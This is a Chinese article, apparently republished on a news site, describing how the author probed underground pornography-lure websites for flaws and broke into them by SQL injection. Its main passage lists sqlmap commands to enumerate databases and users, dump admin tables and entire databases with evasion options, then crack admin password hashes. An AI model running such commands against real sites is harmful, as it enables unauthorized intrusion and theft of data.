-
拼客学院陈鑫杰:揭秘地下色情诱导网站,上车吧!
关键字: 揭秘地下色情诱导网站4、漏洞挖掘
如果按照正常的灰产打击流程,最直接的方法就是采用“钓鱼执法”,例如直接微信或者支付宝支付,然后看看能否加到好友,继而直接揪出幕后运营者(如果对方用的小号,并且腾讯和阿里不介入,此方法估计走不通)。
所以,在这之前,我们先看看能否在技术上进行突破。例如,能否通过拿到后台数据库,找到后台管理页面,直接接管网站,或者通过数据库找到更加详细的管理员账号信息等等,甚至通过服务器提权拿到整个服务器权限;而实现这些的前提是:能否找到这套“色情CMS”的漏洞?
考虑到这类Web软件偏“地下流传”,不像知名的discuz论坛,有很多公开漏洞和渗透工具可以直接利用。所以,先用Web漏扫看看有没有能否找到常规漏洞。先对托管在国外的几个色情网站动手,发现都是PHP+MySQL架构,很多在Windows+IIS上面跑,而且幸运的是,大体都能爆出SQL注入和XSS跨站脚本漏洞,当然,这些漏洞能不能用,还得进一步验证。
(注明:上面提到的漏扫,Burp/AWVS/Appscan随意,更具体的使用这里省去)
5、SQL注入渗透
接下来,先手工找几个注入点看看,点击网站的分类列表,可以得到类似“php?id=x“的链接=>
这里收集了不同网站的一批注入点,然后我们拿神器SQLmap出来溜一圈。不同网站防护情况不同(例如安装了waf),注入的效果是不同的,不能一条指令走到黑,需要调整注入的参数,例如是否加长时间延迟、是否采用随机头部、是否加大注入级别。按照这个思路,大概需要用到这些指令:
① SQL注入得到数据库和管理员信息
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --dbms mysql
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --time-sec 2 --dbms mysql --level=2 --risk=2 --random-agent
②根据注入得到的数据库,获取数据库里面的数据表
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“ --random-agent
③获取管理员数据表或者暴力脱裤
sqlmap.py -u http://txxxcom/list.php?id=1 --dump -T “xxadminxx“ -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --dbms mysql --dump-all -D “aaaaaa“
(注入失败)
(注入成功,正在下载数据库和获取管理员账号密码)
(注入成功,进行管理员密码破解,这里哈希值没跑出来,需要借助在线MD5工具破解)
成功的并且dump数据库下来的部分网站截图:
- 原标题:[冇眼睇]揭秘地下色情诱导网站,上车吧! 本文仅代表作者个人观点。
- 责任编辑:李泠
-
“五一”近3亿人次出游、花了1668.9亿元 评论 55“美国首次暂停,以色列深感担忧” 评论 131习近平抵达巴黎开始对法国进行国事访问 评论 41刚有“明显进展”,巴以停火又陷僵局 评论 43他在以色列监狱中死亡,联合国官员:极度震惊 评论 286最新闻 Hot
-
“五一”近3亿人次出游、花了1668.9亿元
-
自作自受?对俄制裁回旋镖射中一瘸一拐的波音
-
马科斯声称:菲律宾不希望加剧南海紧张局势
-
“我想让各位知道,我们不会退缩”
-
他也要对TikTok“真香”了?
-
内塔尼亚胡:任何国际机构都无法阻止以色列“自卫”
-
“美国首次暂停,以色列深感担忧”
-
他窜台炒作:特朗普胜选后将一如既往“挺台”
-
刚有“明显进展”,巴以停火又陷僵局
-
他“替”乌克兰宣布新反攻:2025年发动
-
“欧盟正游说中国:别‘报复’,得特别保护”
-
俄方通缉泽连斯基等乌军政要员,乌方回应
-
“没有沙以关系正常化,就没有美沙防务协议”
-
他在以色列监狱中死亡,联合国官员:极度震惊
-
“丢473个议席!40年来最差”
-
加拿大逮捕3名印度人,印度外长回应
-